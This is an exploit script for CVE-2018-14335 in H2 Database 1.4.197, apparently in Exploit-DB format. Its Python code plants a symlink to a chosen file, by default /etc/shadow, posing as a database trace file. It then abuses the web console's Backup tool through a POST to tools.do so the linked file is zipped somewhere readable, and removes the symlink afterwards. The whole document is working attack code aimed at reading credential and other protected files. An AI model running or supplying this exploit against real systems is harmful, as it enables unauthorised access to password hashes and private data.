# Exploit Title: H2 Database 1.4.197 - Information Disclosure
# Date: 2018-07-16
# Exploit Author: owodelta
# Vendor Homepage: www.h2database.com
# Software Link: http://www.h2database.com/html/download.html
# Version: all versions
# Tested on: Linux
# CVE : CVE-2018-14335
 
# Description: Insecure handling of permissions in the backup function allows
# attackers to read sensitive files (outside of their permissions) via a
# symlink to a fake database file.
 
# PS, thanks to HTB and our team FallenAngels
 
#!/usr/bin/python
 
import requests
import argparse
import os
import random
 
def cleanup(wdir):
    cmd = "rm {}symlink.trace.db".format(wdir)
    os.system(cmd)
 
def create_symlink(file, wdir):
    cmd = "ln -s {0} {1}symlink.trace.db".format(file,wdir)
    os.system(cmd)
 
 
def trigger_symlink(host, wdir):
    outputName = str(random.randint(1000,10000))+".zip"
    #get cookie
    url = 'http://{}'.format(host)
    r = requests.get(url)
    path = r.text.split('href = ')[1].split(';')[0].replace("'","").replace('login.jsp','tools.do')
    url = '{}/{}'.format(url,path)
    payload = {
            "tool":"Backup",
            "args":"-file,"+wdir+outputName+",-dir,"+wdir}
    #print url
    requests.post(url,data=payload).text
    print "File is zipped in: "+wdir+outputName
 
if __name__ == "__main__":
    parser = argparse.ArgumentParser()
    required = parser.add_argument_group('required arguments')
    required.add_argument("-H",
            "--host",
            metavar='127.0.0.1:8082',
            help="Target host",
            required=True)
    required.add_argument("-D",
            "--dir",
            metavar="/tmp/",
            default="/tmp/",
            help="Writable directory")
    required.add_argument("-F",
            "--file",
            metavar="/etc/shadow",
            default="/etc/shadow",
            help="Desired file to read",)
    args = parser.parse_args()
 
create_symlink(args.file,args.dir)
trigger_symlink(args.host,args.dir)
cleanup(args.dir)